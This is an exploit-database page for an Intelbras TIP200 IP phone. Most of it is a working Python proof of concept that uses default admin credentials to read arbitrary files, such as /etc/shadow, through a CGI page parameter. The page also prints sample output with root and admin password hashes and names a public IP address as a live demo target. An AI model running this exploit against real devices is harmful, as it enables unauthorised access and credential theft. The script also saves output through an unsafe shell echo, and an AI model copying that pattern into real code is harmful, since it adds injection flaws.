Intelbras Telefone Local File Disclosure

2018.03.22
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Title: Intelbras Telefone Local File Disclosure # Shodan: Intelbras Telefone IP TIP200 LITE # Date: 21/03/2018 # Tested: w10 # Credit: Informacion - Anonymous # Authors: Matheus Goncalves - anhax0r # Version: [60.0.75.29] (REQUIRED) # Exploit: import requests as http import subprocess import os from requests.auth import HTTPBasicAuth def poc(): print(""" ------------------------------------------------------------------------------------------------------------- ------------- 0day: TELEFONE IP TIP200/200 LITE | Local File Include | Local File Download------------------- ------------- P0c Author: Matheus Goncalves | Pentester at Anhax Security Team ------------------- -------------------------------------------------------------------------------------------------------------\n""") filename = raw_input("filename Ex: /etc/shadow: -> ") if(filename == ""): filename="/etc/shadow" r = http.get("http://192.168.0.207/cgi-bin/cgiServer.exx?page="+str(filename), auth=HTTPBasicAuth('admin', 'admin')) print(" ") text = r.text print(text) savefile = raw_input("Save file? [Y\\n]: ") savefile.upper() if(savefile=="Y" or savefile=="y"): os.system("echo '"+text+"' > "+filename.replace("/etc/", "")) print("File saved !!") start() else: start() def start(): poc() start() #root@hax:~/itscanner# python p0c.py # ------------------------------------------------------------------------------------------------------------- # ------------- 0day: TELEFONE IP TIP200/200 LITE | Local File Include |------------------- # ------------- P0c Author: Matheus Goncalves | Pentester at Anhax Security Team ------------------- # ------------------------------------------------------------------------------------------------------------- #filename Ex: /etc/shadow: -> /etc/shadow #root:$1$83hUAZ/2$GKlGOZlepa6eikA6mfG1l/:11876:0:99999:7::: #admin:DP7Kg4tE0Y9rs:11876:0:99999:7::: #Save file? [Y\n]: y #File saved !! #root@hax:~/itscanner# cat shadow #root:$1$83hUAZ/2$GKlGOZlepa6eikA6mfG1l/:11876:0:99999:7::: #admin:DP7Kg4tE0Y9rs:11876:0:99999:7::: # Dem0: - http://177.135.140.143 ####################################################

References:

https://cxsecurity.com/issue/WLB-2018030168
https://www.exploit-db.com/exploits/44317/
https://www.facebook.com/Informacion-Anonymous-611394289006994/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top